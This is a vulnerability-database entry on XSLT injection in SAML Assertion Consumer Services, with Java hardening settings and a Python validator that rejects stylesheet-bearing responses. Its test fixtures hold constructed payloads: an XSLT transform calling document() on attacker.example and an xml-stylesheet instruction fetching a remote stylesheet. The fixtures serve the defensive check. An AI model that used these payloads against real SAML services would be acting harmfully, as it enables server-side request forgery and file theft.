SAML Consumer Service XSLT injection - Vulnerability Database

Description

The application's SAML Assertion Consumer Service is vulnerable to XSLT (Extensible Stylesheet Language Transformations) injection. The service accepts a SAML response from an unauthenticated client and hands it to an XML processor that honours embedded XSLT, most commonly a <ds:Transform> element inside the XML Signature, which the verifier applies to the signed data before the signature itself is checked. Because the stylesheet runs before any trust decision is made, an attacker who submits a crafted response gets arbitrary XSLT executed with the server's privileges. Depending on the XSLT engine, functions such as document() can read local files or fetch URLs from the server, giving unauthorized file access and server-side request forgery (SSRF).

Remediation

Implement the following security measures to prevent XSLT injection attacks:

1. Disable XSLT Processing (Recommended):
SAML processing does not need XSLT, so refuse it outright. The XML Signature <ds:Transforms> element is the usual carrier for an injected stylesheet; the JDK's XMLDSig implementation rejects XSLT transforms when the org.jcp.xml.dsig.secureValidation property is set to true on the validation context (the default since JDK 17). Where a TransformerFactory must remain in the code path, at least enable secure processing, which restricts extension functions, and block access to external DTDs and stylesheets. For example, in Java:

import javax.xml.XMLConstants;
import javax.xml.transform.TransformerFactory;

// Harden the XSLT processor. This does not disable XSLT: secure processing
// limits what a stylesheet may call, and the empty strings deny access to
// external DTDs and stylesheets (JAXP 1.5 / Java 7u40 and later).
TransformerFactory factory = TransformerFactory.newInstance();
factory.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
factory.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, "");
factory.setAttribute(XMLConstants.ACCESS_EXTERNAL_STYLESHEET, "");

2. Restrict External Resource Access:
Configure the XML parser so that it never resolves external entities or fetches external DTDs. Since SAML messages never legitimately contain a DTD, disallowing DOCTYPE declarations altogether is a safe further step. For example, with SAXParserFactory:

import javax.xml.parsers.SAXParserFactory;

// Stop the parser resolving external general and parameter entities and
// fetching external DTDs (closes XXE and SSRF via entity resolution).
SAXParserFactory spf = SAXParserFactory.newInstance();
spf.setFeature("http://xml.org/sax/features/external-general-entities", false);
spf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
spf.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);

3. Validate SAML Responses:
Inspect each SAML response before it reaches the signature verifier and reject any that contains an <?xml-stylesheet?> processing instruction, any element in the XSLT namespace (http://www.w3.org/1999/XSL/Transform), or a <ds:Transform> whose Algorithm is http://www.w3.org/TR/1999/REC-xslt-19991116. Allow only the transforms your library actually needs (typically enveloped-signature and canonicalization) and validate the message against the SAML schema.

4. Use Secure SAML Libraries:
Utilize well-maintained SAML libraries that have built-in protections against injection attacks and keep them updated to the latest versions.
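The pre-parse check from step 3, combined with the "refuse XSLT outright" stance of step 1, as an added example. This is not code from the original page or from any SAML library; it uses only the Python standard library, and the SAML responses it inspects are constructed for illustration rather than captured from a real identity provider. It decodes the SAMLResponse form parameter, rejects a DOCTYPE (SAML never carries one), then walks the document as a stream of parser events so that it sees <?xml-stylesheet?> processing instructions, elements in the XSLT namespace, and <ds:Transform> elements carrying the XSLT algorithm before anything else has a chance to act on them.

```python
"""Reject SAML responses that smuggle XSLT, before any parser or
signature verifier sees them. Added example; not code from the
original page or from any SAML library. Standard library only."""
import base64
import binascii
import xml.etree.ElementTree as ET

XSLT_NS = "http://www.w3.org/1999/XSL/Transform"
DS_NS = "http://www.w3.org/2000/09/xmldsig#"
# XML Signature transform algorithm identifier for XSLT (XMLDSig spec).
XSLT_TRANSFORM_ALG = "http://www.w3.org/TR/1999/REC-xslt-19991116"


class RejectedSamlResponse(ValueError):
    """Raised when a SAML response fails the XSLT pre-checks."""


def check_saml_response(saml_response_b64: str) -> bytes:
    """Decode a SAMLResponse form parameter and reject anything that
    could drive an XSLT processor. Returns the raw XML bytes on success
    so the caller can hand them to its SAML library; raises otherwise."""
    try:
        xml_bytes = base64.b64decode(saml_response_b64, validate=True)
    except binascii.Error as exc:
        raise RejectedSamlResponse(f"bad base64: {exc}") from exc

    # SAML messages never carry a DTD; refusing one here also shuts out
    # external-entity (XXE) and entity-expansion tricks.
    if b"<!DOCTYPE" in xml_bytes:
        raise RejectedSamlResponse("DOCTYPE not allowed in SAML response")

    # XMLPullParser reports processing instructions as "pi" events; the
    # default ElementTree parser would silently drop <?xml-stylesheet?>.
    parser = ET.XMLPullParser(events=("start", "pi"))
    try:
        parser.feed(xml_bytes)
        parser.close()
    except ET.ParseError as exc:
        raise RejectedSamlResponse(f"malformed XML: {exc}") from exc

    for event, node in parser.read_events():
        if event == "pi":
            # node.text is "<target> <data>"; the XML declaration is not a PI.
            target = (node.text or "").split(None, 1)[0]
            if target == "xml-stylesheet":
                raise RejectedSamlResponse("xml-stylesheet PI not allowed")
            continue
        # "start" event: node.tag is in Clark notation, "{namespace}local".
        if node.tag.startswith("{" + XSLT_NS + "}"):
            raise RejectedSamlResponse(f"XSLT element not allowed: {node.tag}")
        if (node.tag == "{" + DS_NS + "}Transform"
                and node.get("Algorithm") == XSLT_TRANSFORM_ALG):
            raise RejectedSamlResponse("XSLT transform in ds:Signature not allowed")
    return xml_bytes


def is_safe_saml_response(saml_response_b64: str) -> bool:
    """Accept/reject wrapper around check_saml_response."""
    try:
        check_saml_response(saml_response_b64)
    except RejectedSamlResponse:
        return False
    return True


def _b64(xml: str) -> str:
    return base64.b64encode(xml.encode()).decode()


# Constructed inputs for illustration (not captured from a real IdP).
_HEAD = ('<samlp:Response xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol"\n'
         '    xmlns:ds="http://www.w3.org/2000/09/xmldsig#" ID="_r1" Version="2.0">\n'
         '  <ds:Signature><ds:SignedInfo><ds:Reference URI="#_r1"><ds:Transforms>\n')
_TAIL = '</ds:Transforms></ds:Reference></ds:SignedInfo></ds:Signature></samlp:Response>'

BENIGN_RESPONSE = _b64('<?xml version="1.0"?>\n' + _HEAD
    + '<ds:Transform Algorithm="http://www.w3.org/2000/09/xmldsig#enveloped-signature"/>\n'
    + '<ds:Transform Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/>\n' + _TAIL)

XSLT_IN_SIGNATURE = _b64('<?xml version="1.0"?>\n' + _HEAD
    + '<ds:Transform Algorithm="' + XSLT_TRANSFORM_ALG + '">\n'
    + '  <xsl:stylesheet xmlns:xsl="' + XSLT_NS + '" version="1.0">\n'
    + '    <xsl:template match="/"><xsl:value-of select="document(\'http://attacker.example/\')"/></xsl:template>\n'
    + '  </xsl:stylesheet>\n</ds:Transform>\n' + _TAIL)

XSLT_STYLESHEET_PI = _b64('<?xml version="1.0"?>\n'
    '<?xml-stylesheet type="text/xsl" href="http://attacker.example/x.xsl"?>\n'
    + _HEAD + _TAIL)

DOCTYPE_RESPONSE = _b64('<?xml version="1.0"?>\n<!DOCTYPE Response [<!ENTITY x "y">]>\n'
    + _HEAD + _TAIL)

if __name__ == "__main__":
    for name in ("BENIGN_RESPONSE", "XSLT_IN_SIGNATURE", "XSLT_STYLESHEET_PI", "DOCTYPE_RESPONSE"):
        verdict = "accepted" if is_safe_saml_response(globals()[name]) else "rejected"
        print(f"{name}: {verdict}")
```

The check is deliberately a gate in front of the SAML library, not a replacement for it: the library still has to verify the signature, audience, timestamps and the rest. Reading attributes on the "start" event is enough because the parser has the full start tag by then, and working from events rather than a built tree means the stylesheet is rejected before the document is ever handed to anything that could run it.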
